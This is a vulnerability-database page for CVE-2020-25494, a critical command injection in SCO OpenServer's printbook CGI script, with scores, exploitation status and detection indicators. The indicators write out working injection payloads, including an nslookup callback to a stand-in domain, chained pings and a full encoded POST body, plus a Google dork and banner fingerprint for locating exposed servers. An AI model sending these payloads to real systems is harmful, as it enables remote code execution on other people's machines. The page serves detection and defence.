cbcvebase.
CVE-2020-25494
published 2020-12-18

CVE-2020-25494: Xinuos (formerly SCO) Openserver v5 and v6 allows attackers to execute arbitrary commands via shell metacharacters in outputform or toclevels parameter to…

PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
39.19%
98.4th percentile
Xinuos (formerly SCO) Openserver v5 and v6 allows attackers to execute arbitrary commands via shell metacharacters in outputform or toclevels parameter to cgi-bin/printbook.

Affected

2 ranges
VendorProductVersion rangeFixed in
xinuosopenserver
xinuosopenserver

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://host:8457/cgi-bin/printbook
path/cgi-bin/printbook
port8457
command|nslookup -q=cname mytest.com.&
command|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #" |ping -n 21 127.0.0.1
otheroutputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%20%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20%7cping%20-n%2021%20127.0.0.1&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html&part=%2Fen%2FUSE_oview%2FCONTENTS.
  • Monitor POST requests to /cgi-bin/printbook containing shell metacharacters (|, `, #, &) in the 'outputform' or 'toclevels' parameters, which indicate OS command injection attempts.
  • Use the Google dork 'inurl:/cgi-bin/manlist?section' to identify exposed SCO Openserver instances on the internet.
  • Alert on outbound DNS lookups (nslookup/dig) or ICMP ping traffic originating from the web server process (e.g., Apache/CGI child) as an indicator of successful out-of-band command injection.
  • The vulnerable service runs on TCP port 8457 under Apache/1.3.33 with mod_perl/1.29. Fingerprint this server banner to identify exposed targets.
  • ·Both 'outputform' and 'toclevels' POST parameters are vulnerable; detection rules must cover both parameters, not just one.
  • ·Exploitation is confirmed on SCO Openserver 5.0.7 and version 6; other versions may also be affected.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.